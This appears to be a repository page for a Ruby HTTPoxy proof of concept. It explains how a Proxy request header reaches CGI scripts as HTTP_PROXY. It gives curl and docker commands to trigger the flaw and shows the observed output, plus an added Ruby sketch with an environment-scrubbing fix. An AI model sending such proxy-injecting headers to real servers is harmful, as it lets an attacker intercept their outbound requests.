Short Description
A contrived example of the HTTPoxy vulnerability for a Ruby WEBrick server
Full Description

Ruby HTTPoxy PoC (gordonchan/ruby-httpoxy)

A somewhat contrived example of the HTTPoxy vulnerability for a Ruby WEBrick server that is serving CGI scripts. Demonstrates:

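  • WEBrick::HTTPRequest prefixes request header names with "HTTP_", and WEBrick::HTTPServlet::CGIHandler passes them into the CGI script's environment, so a client-supplied Proxy header becomes the HTTP_PROXY environment variable. Apache does the same for CGI scripts.
  • Ruby net/http is not vulnerable, because URI::Generic#find_proxy does not use HTTP_PROXY in a CGI environment.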
  • But if the Ruby CGI script calls a system program that uses an affected HTTP client (e.g. Go net/http), the HTTP_PROXY environment variable will be respected and its value will be used for outbound HTTP requests. :(
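The chain in the bullets above, reduced to a runnable sketch together with the fix on the CGI script's side. This is an added example, not code from gordonchan/ruby-httpoxy; the helper names, the sample proxy URL and the Ruby child process standing in for ./go-proxy-check are assumptions.

```ruby
require "open3"
require "rbconfig"

# Constructed sample request headers (not taken from the page).
SAMPLE_HEADERS = {
  "Proxy"      => "http://proxy.example.invalid:8080",
  "User-Agent" => "curl"
}.freeze

# Header-to-environment mapping a CGI gateway applies (RFC 3875):
# upper-case the name, turn "-" into "_", prefix "HTTP_".
def cgi_meta_vars(headers)
  headers.each_with_object({}) do |(name, value), env|
    env["HTTP_" + name.upcase.tr("-", "_")] = value
  end
end

# Hypothetical stand-in for a system program whose HTTP client trusts
# HTTP_PROXY: it reports the proxy value it sees in its environment.
CHILD = [RbConfig.ruby, "-e", "print ENV.fetch('HTTP_PROXY', 'none')"].freeze

# Risky pattern: the child inherits the request-derived environment as is.
def run_child_inherit(cgi_env)
  out, _status = Open3.capture2(cgi_env, *CHILD)
  out
end

# Hardened pattern: a nil value tells Process.spawn to unset the variable
# in the child, whatever the parent process or the request supplied.
def run_child_scrubbed(cgi_env)
  out, _status = Open3.capture2(cgi_env.merge("HTTP_PROXY" => nil), *CHILD)
  out
end

if __FILE__ == $PROGRAM_NAME
  env = cgi_meta_vars(SAMPLE_HEADERS)
  puts "inherited: #{run_child_inherit(env)}"
  puts "scrubbed:  #{run_child_scrubbed(env)}"
end
```

Dropping the Proxy request header at the web server or reverse proxy, before it reaches any CGI handler, closes the same path for every script at once.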

Quick Start:

$ ./server
$ curl -H "Proxy:" localhost:4000/ruby.cgi -v

With Docker:

$ docker run --rm -p 4000:4000 gordonchan/ruby-httpoxy
$ curl -H "Proxy:" $(docker-machine ip):4000/ruby.cgi -v

With Docker (Apache):

$ docker run --rm -p 80:80 gordonchan/ruby-apache-httpoxy
$ curl -H "Proxy:" $(docker-machine ip):80/ruby.cgi -v

Observed Output

*   Trying ::1...
* Connected to localhost (::1) port 4000 (#0)
> GET /ruby.cgi HTTP/1.1
> Host: localhost:4000
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy:
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: WEBrick/1.3.1 (Ruby/2.3.0/2015-12-25)
< Date: Tue, 02 Aug 2016 11:42:57 GMT
< Content-Length: 409
< Connection: Keep-Alive

net/http proxy check:

`./go-proxy-check` (system command):
In Go Land (using net/http)



ruby-httpoxy is Copyright (c) 2016 Gordon Chan and is released under the MIT License. It is free software, and may be redistributed under the terms specified in the LICENSE file.
